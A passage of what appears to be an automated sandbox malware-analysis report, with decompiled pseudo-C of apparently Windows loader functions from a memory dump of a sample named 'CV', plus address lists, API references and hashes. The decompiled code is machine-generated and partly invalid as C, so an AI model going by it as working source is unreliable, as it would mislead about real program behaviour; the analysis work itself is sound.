																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L01258F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01283C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0125d5f2
0x0125d5f5
0x0125d5f5
0x0125d5fd
0x0125d600
0x0125d60a
0x0125d60d
0x0125d617
0x0125d61d
0x0125d627
0x0125d62e
0x0125d911
0x0125d913
0x00000000
0x0125d919
0x0125d919
0x0125d919
0x0125d634
0x0125d634
0x0125d634
0x0125d634
0x0125d640
0x0125d8bf
0x00000000
0x0125d646
0x0125d646
0x0125d64d
0x0125d652
0x012ab2fc
0x012ab2fc
0x012ab302
0x012ab33b
0x012ab341
0x00000000
0x012ab304
0x012ab304
0x012ab319
0x012ab31e
0x012ab324
0x012ab326
0x012ab332
0x012ab347
0x012ab34c
0x012ab351
0x012ab35a
0x00000000
0x012ab328
0x012ab328
0x00000000
0x012ab328
0x012ab326
0x0125d658
0x0125d658
0x0125d65b
0x0125d665
0x00000000
0x0125d66b
0x0125d66b
0x0125d66b
0x0125d66b
0x0125d66d
0x0125d672
0x0125d67a
0x00000000
0x00000000
0x0125d680
0x0125d686
0x0125d8ce
0x0125d8d4
0x0125d8dd
0x0125d8e0
0x0125d68c
0x0125d691
0x0125d69d
0x0125d6a2
0x0125d6a7
0x0125d6b0
0x0125d6b5
0x0125d6e0
0x0125d6b7
0x0125d6b7
0x0125d6b9
0x0125d6b9
0x0125d6bb
0x0125d6bd
0x0125d6ce
0x0125d6d0
0x0125d6d2
0x012ab363
0x012ab365
0x00000000
0x012ab36b
0x00000000
0x012ab36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0125d6bf
0x0125d6bf
0x0125d6e5
0x0125d6e7
0x0125d6e9
0x0125d6ec
0x0125d6ec
0x0125d6ef
0x0125d6f5
0x0125d6f9
0x0125d6fb
0x0125d6fd
0x0125d701
0x0125d703
0x0125d70a
0x0125d70a
0x0125d701
0x0125d710
0x0125d710
0x0125d6c1
0x0125d6c1
0x0125d6c6
0x012ab36d
0x012ab36f
0x00000000
0x012ab375
0x012ab375
0x012ab375
0x00000000
0x012ab375
0x00000000
0x0125d6cc
0x0125d6d8
0x0125d6d8
0x0125d6d8
0x00000000
0x0125d6c6
0x0125d6bf
0x00000000
0x0125d6da
0x0125d6da
0x0125d716
0x0125d71b
0x0125d720
0x0125d726
0x0125d726
0x0125d72d
0x00000000
0x0125d733
0x0125d739
0x0125d742
0x0125d750
0x0125d758
0x0125d764
0x0125d776
0x0125d77a
0x0125d783
0x0125d928
0x0125d92c
0x0125d93d
0x0125d944
0x0125d94f
0x0125d954
0x0125d956
0x0125d95f
0x0125d961
0x0125d973
0x0125d973
0x0125d956
0x0125d944
0x0125d92c
0x0125d78b
0x012ab394
0x0125d791
0x0125d798
0x012ab3a3
0x012ab3bb
0x012ab3bb
0x0125d7a5
0x0125d866
0x0125d870
0x0125d884
0x0125d892
0x0125d898
0x0125d89e
0x0125d8a0
0x0125d8a6
0x0125d8ac
0x0125d8ae
0x0125d8b4
0x0125d8b4
0x0125d8ae
0x0125d7a5
0x0125d78b
0x0125d7b1
0x012ab3c5
0x012ab3c5
0x0125d7c3
0x0125d7ca
0x0125d7e5
0x0125d7eb
0x0125d8eb
0x0125d8ed
0x00000000
0x0125d8f3
0x0125d8f3
0x0125d8f3
0x00000000
0x0125d8ed
0x0125d7cc
0x0125d7cc
0x0125d7d2
0x00000000
0x0125d7d4
0x0125d7d4
0x0125d7d7
0x0125d7df
0x012ab3d4
0x012ab3d9
0x012ab3dc
0x012ab3dc
0x012ab3df
0x012ab3e2
0x012ab468
0x012ab46d
0x012ab46f
0x012ab46f
0x012ab475
0x0125d8f8
0x0125d8f9
0x0125d8fd
0x012ab3e8
0x012ab3e8
0x012ab3eb
0x012ab3ed
0x00000000
0x012ab3ef
0x012ab3ef
0x012ab3f1
0x012ab3f4
0x012ab3fe
0x012ab404
0x012ab409
0x012ab40e
0x012ab410
0x012ab410
0x012ab414
0x012ab414
0x012ab41b
0x012ab420
0x012ab423
0x012ab425
0x012ab427
0x012ab42a
0x012ab42d
0x012ab42d
0x012ab42a
0x012ab432
0x012ab436
0x012ab438
0x012ab43b
0x012ab43b
0x012ab449
0x012ab44e
0x012ab454
0x012ab458
0x012ab458
0x012ab45d
0x00000000
0x012ab45d
0x012ab3ed
0x00000000
0x00000000
0x00000000
0x0125d7df
0x0125d7d2
0x0125d7ca
0x012ab37c
0x012ab37e
0x012ab385
0x012ab38a
0x00000000
0x012ab38a
0x0125d742
0x0125d7f1
0x0125d7f8
0x012ab49b
0x012ab49b
0x0125d800
0x0125d837
0x0125d843
0x0125d845
0x0125d847
0x0125d84a
0x0125d84b
0x0125d84e
0x0125d857
0x0125d802
0x0125d802
0x0125d80d
0x00000000
0x0125d818
0x0125d818
0x0125d824
0x0125d831
0x012ab4a5
0x012ab4ab
0x012ab4b3
0x012ab4b8
0x012ab4bb
0x00000000
0x012ab4c1
0x012ab4c1
0x012ab4c8
0x00000000
0x012ab4ce
0x012ab4d4
0x012ab4e1
0x012ab4e3
0x012ab4e5
0x00000000
0x012ab4eb
0x012ab4f0
0x012ab4f2
0x0125dac9
0x0125dacc
0x0125dacf
0x0125dad1
0x0125dd78
0x0125dd78
0x0125dcf2
0x00000000
0x0125dad7
0x0125dad9
0x0125dadb
0x00000000
0x00000000
0x0125dae1
0x0125dae1
0x0125dae4
0x0125dae6
0x012ab4f9
0x012ab4f9
0x012ab500
0x0125daec
0x0125daec
0x0125daf5
0x0125daf8
0x0125dafb
0x0125db03
0x0125db11
0x0125db16
0x0125db19
0x0125db1b
0x012ab52c
0x012ab531
0x012ab534
0x0125db21
0x0125db21
0x0125db24
0x0125dcd9
0x0125dce2
0x0125dce5
0x0125dd6a
0x0125dd6d
0x00000000
0x0125dd73
0x012ab51a
0x012ab51c
0x012ab51f
0x012ab524
0x00000000
0x012ab524
0x0125dce7
0x0125dce7
0x0125dce7
0x00000000
0x0125dce7
0x00000000
0x0125db2a
0x0125db2c
0x0125db31
0x0125db33
0x0125db36
0x0125db39
0x0125db3b
0x0125db66
0x0125db66
0x0125db3d
0x0125db3d
0x0125db3e
0x0125db46
0x0125db47
0x0125db49
0x0125db4c
0x0125db53
0x0125db55
0x0125db58
0x0125db5a
0x012ab50a
0x012ab50f
0x012ab512
0x0125db60
0x0125db60
0x0125db63
0x0125db63
0x00000000
0x0125db63
0x0125db5a
0x0125db3b
0x0125db24
0x0125db69
0x0125db69
0x0125db6c
0x0125db6f
0x0125db74
0x012ab557
0x012ab557
0x012ab55e
0x0125db7a
0x0125db7c
0x0125db7f
0x0125db82
0x0125db85
0x00000000
0x0125db8b
0x0125db8b
0x0125db8d
0x0125db9b
0x0125db9b
0x0125db9d
0x0125dba0
0x0125dba2
0x0125dba4
0x0125dba7
0x0125dba9
0x0125dbae
0x0125dbae
0x0125dbb1
0x0125dbb4
0x0125dbb4
0x0125dbb7
0x0125dbba
0x0125dcd2
0x0125dcd4
0x00000000
0x0125dbc0
0x0125dbc0
0x0125dbd2
0x0125dbd7
0x0125dbda
0x0125dbdd
0x0125dbdf
0x00000000
0x0125dbe5
0x0125dbe5
0x0125dbee
0x0125dbf1
0x012ab541
0x012ab544
0x00000000
0x012ab546
0x012ab546
0x00000000
0x012ab546
0x0125dbf7
0x0125dbf7
0x0125dbfd
0x0125dbfd
0x0125dbff
0x0125dc0b
0x0125dc15
0x0125dc1b
0x0125dc1d
0x0125dc21
0x0125dc21
0x0125dc23
0x0125dc23
0x0125dc26
0x0125dc29
0x0125dc2b
0x00000000
0x00000000
0x0125dc31
0x0125dc34
0x0125dc36
0x0125dcbf
0x0125dcbf
0x0125dcc2
0x00000000
0x0125dc3c
0x0125dc41
0x0125dc43
0x00000000
0x0125dc45
0x0125dc45
0x0125dc47
0x00000000
0x0125dc4d
0x0125dc4d
0x0125dc50
0x0125dc52
0x0125dc55
0x0125dcfa
0x0125dcfe
0x0125dd08
0x0125dd0a
0x0125dd0c
0x00000000
0x0125dd12
0x0125dd15
0x0125dd2d
0x0125dd2f
0x0125dd32
0x0125dd35
0x00000000
0x0125dd35
0x0125dc5b
0x0125dc5b
0x0125dc5e
0x0125dc61
0x0125dc64
0x0125dc67
0x0125dc67
0x0125dc6a
0x0125dc6c
0x0125dc8e
0x0125dc8e
0x0125dc91
0x0125dc93
0x0125dcce
0x0125dcce
0x0125dc95
0x0125dc9c
0x0125dc6e
0x0125dc72
0x0125dc75
0x0125dc77
0x0125dc79
0x012ab551
0x012ab551
0x00000000
0x0125dc7f
0x0125dc7f
0x0125dc81
0x00000000
0x0125dc83
0x0125dc86
0x0125dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0125dc88
0x0125dc81
0x0125dc79
0x0125dc6c
0x0125dc55
0x0125dc47
0x0125dc43
0x00000000
0x0125dc36
0x0125dc23
0x00000000
0x0125dbff
0x0125dbf1
0x0125dbdf
0x0125db8f
0x0125db92
0x0125db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0125db95
0x0125db8d
0x0125db85
0x0125db74
0x0125dc9f
0x0125dca2
0x0125dcb0
0x0125dcb0
0x0125dad1
0x012ab4e5
0x012ab4c8
0x00000000
0x00000000
0x00000000
0x0125d831
0x0125d80d
0x00000000
0x0125d800
0x012ab47f
0x012ab485
0x00000000
0x012ab485
0x0125d665
0x0125d652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 0125D898

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0c66c1efea0c343b519fb98202d8eb7affab4f0158ca584d424c25520dc406b8
Instruction ID: 5336bdc7be2c6f4f368380ef0cfaf61fb4026c9a6bb9985cbbe4cb8d78f71b91
Opcode Fuzzy Hash: 0c66c1efea0c343b519fb98202d8eb7affab4f0158ca584d424c25520dc406b8
Instruction Fuzzy Hash: 8BE1E130A2035ACFEB74DF68C894B79BBB5BF85304F040199DE0997291D7749D81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0127513A Relevance: 1.8, APIs: 1, Instructions: 258
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0127513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x133d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0128D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01262280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01264620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0128F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0125FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x133b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0128B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x01275142
0x0127514c
0x01275150
0x01275157
0x01275159
0x0127515e
0x01275165
0x01275169
0x0127516c
0x01275172
0x01275176
0x0127517a
0x0127517a
0x0127517a
0x0127517f
0x012b6d8b
0x012b6d8e
0x012b6d91
0x012b6d95
0x012b6d98
0x012b6d9c
0x012b6da0
0x012b6da3
0x012b6da7
0x012b6e26
0x012b6e26
0x012b6e2a
0x012751f9
0x012751f9
0x012751fe
0x012b6e33
0x012b6e33
0x012b6e39
0x012b6e3d
0x012b6e46
0x012b6e50
0x00000000
0x00000000
0x012b6e52
0x012b6e53
0x012b6e56
0x012b6e5d
0x00000000
0x00000000
0x00000000
0x012b6e5f
0x012b6e67
0x012b6e77
0x012b6e7f
0x012b6e80
0x012b6e88
0x012b6e90
0x012b6e9f
0x012b6ea5
0x012b6ea9
0x012b6eb1
0x012b6ebf
0x00000000
0x00000000
0x012b6ecf
0x012b6ed3
0x00000000
0x00000000
0x012b6edb
0x012b6ede
0x012b6ee1
0x012b6ee8
0x012b6eeb
0x012b6eed
0x012b6ef0
0x012b6ef4
0x012b6ef8
0x012b6efc
0x00000000
0x00000000
0x012b6f0d
0x012b6f11
0x012b6f32
0x012b6f37
0x012b6f3b
0x012b6f3e
0x012b6f41
0x012b6f46
0x00000000
0x00000000
0x012b6f4c
0x012b6f50
0x012b6f50
0x012b6f54
0x012b6f62
0x012b6f65
0x012b6f6d
0x012b6f7b
0x012b6f7b
0x012b6f93
0x012b6f98
0x012b6fa0
0x012b6fa6
0x012b6fb3
0x012b6fb6
0x012b6fbf
0x012b6fc1
0x012b6fd5
0x012b6fda
0x012b6fda
0x012b6fdd
0x012b6fe2
0x012b6fe7
0x012b6feb
0x012b6fef
0x012b6ff3
0x0127520c
0x0127520c
0x0127520f
0x01275215
0x01275234
0x0127523a
0x0127523a
0x01275244
0x01275245
0x01275246
0x01275251
0x01275251
0x012b6f13
0x012b6f17
0x012b6f17
0x012b6f18
0x012b6f1b
0x012b6f1f
0x012b6f23
0x00000000
0x012b6f28
0x01275204
0x01275204
0x01275208
0x00000000
0x01275208
0x01275185
0x01275188
0x0127518a
0x0127518e
0x01275195
0x012b6db1
0x012b6db5
0x012b6db9
0x0127519b
0x0127519b
0x0127519e
0x012751a7
0x012751a9
0x012751a9
0x012751b5
0x012751b8
0x012751bb
0x012751be
0x012751c1
0x012751c5
0x012751c9
0x012751cd
0x012751cd
0x012751d8
0x012751dc
0x012751e0
0x012b6dcc
0x012b6dd0
0x012b6dd5
0x012b6ddd
0x012b6de1
0x012b6de1
0x012b6de5
0x012b6deb
0x012b6df1
0x012b6df7
0x012b6dfd
0x012b6e01
0x012b6e05
0x012b6e09
0x012b6e0d
0x012b6e11
0x012b6e11
0x012751eb
0x012b6e1a
0x012b6e1f
0x012b6e21
0x012b6e23
0x00000000
0x012751f1
0x012751f1
0x00000000
0x012751f1

APIs

RtlDebugPrintTimes.NTDLL ref: 01275234

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 60068b532a80fc480a444d0842dee78c8fa507786ac7fda170480abffcc889ac
Instruction ID: 3b98d9084e17239d361132f554f18859614099931b0aa2022675f5c2ea821846
Opcode Fuzzy Hash: 60068b532a80fc480a444d0842dee78c8fa507786ac7fda170480abffcc889ac
Instruction Fuzzy Hash: B4C134755193818FD354CF28C580A6AFBF1BF88304F18896EF9998B392D771E985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 012703E2 Relevance: 1.8, APIs: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E012703E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x133d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01270548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0128B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0125B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1337c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01267D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01267D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E012C7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01289830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E012C69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1337c04 != 0) {
						_t118 = _v12;
						_t120 = E012CA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1337bd8;
						if( *0x1337bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E012895D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E012899A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E012C3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0124B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0128AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1338474 - 3;
										if( *0x1338474 != 3) {
											 *0x13379dc =  *0x13379dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01267D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01267D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E012C7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
